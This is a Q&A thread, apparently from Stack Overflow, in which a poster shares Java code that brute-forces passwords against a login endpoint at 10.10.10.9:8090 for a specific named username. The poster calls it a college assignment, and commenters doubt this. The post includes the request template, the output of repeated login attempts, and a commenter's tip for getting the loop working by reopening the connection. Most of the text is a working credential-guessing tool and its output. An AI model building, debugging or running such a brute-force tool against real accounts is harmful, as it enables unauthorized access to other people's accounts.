# Brute Force Algorithm doesn't get appropriate response from server

Tags: java, algorithm, httpresponse, brute-force, http-post

I was implementing a Brute Force Algorithm as a part of college assignment. My program sends post request to the server with different passwords each time. Trouble is I get a response only for the first request, for subsequent requests the server doesn't respond at all.

Here is the code.

BruteForce.java

```
import java.io.*;
import java.net.*;

class BruteForce
{
private byte[] seq = new byte[]{0,0,0,0,0,0};
private char[] map = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789".toCharArray();
public static void main(String[] args) throws IOException
{
    BruteForce bf = new BruteForce();
    bf.go(args[0]);
}

public void next(int i)
{
    seq[i]++;
    if(seq[i]==62)
    {
        seq[i]=0;
        next(i-1);
    }
}

public void go(String st) throws IOException
{
    int l;
    RequestReader reqMan = new RequestReader();
    String t[] = reqMan.constructRequestString(new File(st));
    String header = t[0];
    String param = t[1];
    t = null;


    //SocketAddress addr = new InetSocketAddress("127.0.0.1", 8888);
    //Proxy proxy = new Proxy(Proxy.Type.SOCKS, addr);
    Socket s = new Socket();
    InetSocketAddress dest = new InetSocketAddress("10.10.10.9", 8090);
    s.connect(dest);

    BufferedReader r = new BufferedReader(new InputStreamReader(s.getInputStream()));
    PrintWriter w = new PrintWriter(s.getOutputStream());

    //Actual BruteForce Algorithm

    int index = 5;
    while(seq[0] != 1)
    {
        String pass="";

        //for(int j=0;j<6;j++)
        //System.out.print(seq[j]+" ");
        //System.out.println();

        for(int i=1;i<=5;i++)
        {
            pass = pass + map[seq[i]];
        }

        //r = new BufferedReader(new InputStreamReader(s.getInputStream()));

        String tp = header + "\n\n" + param.replace("password=","password="+pass);
        System.out.println(tp);
        w.write(tp);
        w.flush();

        while((l=r.read())!=-1)
        System.out.print((char)l);

        System.out.println();

        try
        {
            Thread.sleep(10000);
        }
        catch(Exception e)
        {}

        next(index);
    }       
}
}
```

RequestReader.java

```
import java.io.*;

class RequestReader
{
public static void main(String[] args) throws IOException
{
    RequestReader reqRead = new RequestReader();
    String[] t = reqRead.constructRequestString(new File(args[0]));
    System.out.print(t[0]+"\n"+t[1]);
}

public String[] constructRequestString(File f) throws IOException
{
    String temp="";
    int ch;
    BufferedReader in = new BufferedReader(new InputStreamReader(new FileInputStream(f)));
    while((ch=in.read())!= -1)
    {
        temp += (char)ch;
    }
    //System.out.print(temp);
    String[] tokens = temp.split("\n\n");
    tokens[1] = tokens[1].replace("\n","");     //'\n' is automatically added to the end of string while reading. This line truncates '\n'.


    in.close();
    return tokens;
}
}
```

file

```
POST /login.xml HTTP/1.1
Host: 10.10.10.9:8090
Connection: keep-alive
Content-Length: 90
Origin: http://10.10.10.9:8090
User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko)            Chrome/29.0.1547.65 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://10.10.10.9:8090/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8

mode=191&username=syedshahyasser.hussain.it14&password=&a=1379675423937&producttype=0
```

Result

```
POST /login.xml HTTP/1.1
Host: 10.10.10.9:8090
Connection: keep-alive
Content-Length: 90
Origin: http://10.10.10.9:8090
User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko)      Chrome/29.0.1547.65 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://10.10.10.9:8090/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8

mode=191&username=syedshahyasser.hussain.it14&password=aaaaa&a=1379675423937&producttype=0
HTTP/1.1 200 OK
Connection: close
Content-Type: text/xml

<?xml version='1.0' ?><requestresponse><status>LOGIN</status><message><![CDATA[The system could not log you on. Make sure your password is correct]]></message><logoutmessage>You have successfully logged off</logoutmessage><state></state></requestresponse> 

POST /login.xml HTTP/1.1
Host: 10.10.10.9:8090
Connection: keep-alive
Content-Length: 90
Origin: http://10.10.10.9:8090
User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko)       Chrome/29.0.1547.65 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://10.10.10.9:8090/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8

mode=191&username=syedshahyasser.hussain.it14&password=aaaab&a=1379675423937&producttype=0

POST /login.xml HTTP/1.1
Host: 10.10.10.9:8090
Connection: keep-alive
Content-Length: 90
Origin: http://10.10.10.9:8090
User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko)     Chrome/29.0.1547.65 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://10.10.10.9:8090/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8

mode=191&username=syedshahyasser.hussain.it14&password=aaaac&a=1379675423937&producttype=0

POST /login.xml HTTP/1.1
Host: 10.10.10.9:8090
Connection: keep-alive
Content-Length: 90
Origin: http://10.10.10.9:8090
User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.65 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://10.10.10.9:8090/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8

mode=191&username=syedshahyasser.hussain.it14&password=aaaad&a=1379675423937&producttype=0
```

As you can see the first request and response behave as they should. From then on the request is sent but the response does not arrive.

Comment: Maybe the server is smart enough to know what you are up to and refuses to respond?

Comment: Then it shouldn't have responded for even the first request.

Comment: It would respond to first request because it can't distinguish your program from a real user. When you start flooding it with attempts, it is easy to understand you're trying to brute force it.

Comment: Arguably, the server behaved correctly for all the attempts. It responded as quickly as possible to the first attempt. When the second and subsequent attempts arrived too soon after that to be the result of user typing, it stopped responding. I hope your instructor made prior arrangements with the owner of the server - there is probably a log entry recording a brute force attack.

Comment: I changed the code to make the thread sleep for 10 seconds before sending the next request. Still, no response.

Comment: I suggest sending just two requests, about a minute apart. That mimics common human behavior. If it does not get a response to the second request, there is a problem other than the server defending itself.

Comment: Tried what you suggested, same result.

Comment: I have a feeling there is something wrong in the way I am reading the response from the server. If anyone could check my BruteForce.java code from "while((l = r.read()) ! = -1)", it would be a great help.

Comment: Right, "college assignment" :P In any case, have you tried using a new stream on every iteration? I'm not sure, but maybe the server is closing the stream when it finishes its response, thus you'd never receive another output until the new stream is established.